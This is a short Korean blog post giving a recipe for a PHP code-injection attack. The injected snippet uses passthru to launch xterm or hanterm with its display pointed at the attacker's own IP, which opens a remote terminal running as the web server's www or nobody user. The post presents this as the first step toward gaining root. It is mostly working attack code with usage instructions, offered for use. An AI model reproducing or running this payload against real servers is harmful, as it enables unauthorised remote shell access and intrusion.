일단 X-manager 프로그램이 실행중이여야 한다.
다음 소스를 인젝션 해준다.
<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/xterm -display ${a}:0.0");
?>
공격법은 인젝션 변수에 &a=자신의IP 해주면 된다.
<?
$a=$REMOTE_ADDR;
passthru("/usr/X11R6/bin/hanterm -display ${a}:0.0");
?>
위의 프로그램은 Hanterm을 띄울때 실행해 주면 된다.
한텀이 띄어진후 finger명령을 실행하면 WWW나 nobody권한으로
쉘이 뜨는것을 확인할 수 있다.
이제부터 ROOT를 따기위한 기초작업이 성립된 것이다.
영삼넷
Categories
Recent Posts
Recent Comments
Statistics
- Total Visitors:
- 419689
- Today:
- 684681
- Yesterday:
- 9758188
IT강국 김영삼 블로그에 오신걸 진심으로 환영합니다.
©2002 영삼넷 // openkr
©2002 영삼넷 // openkr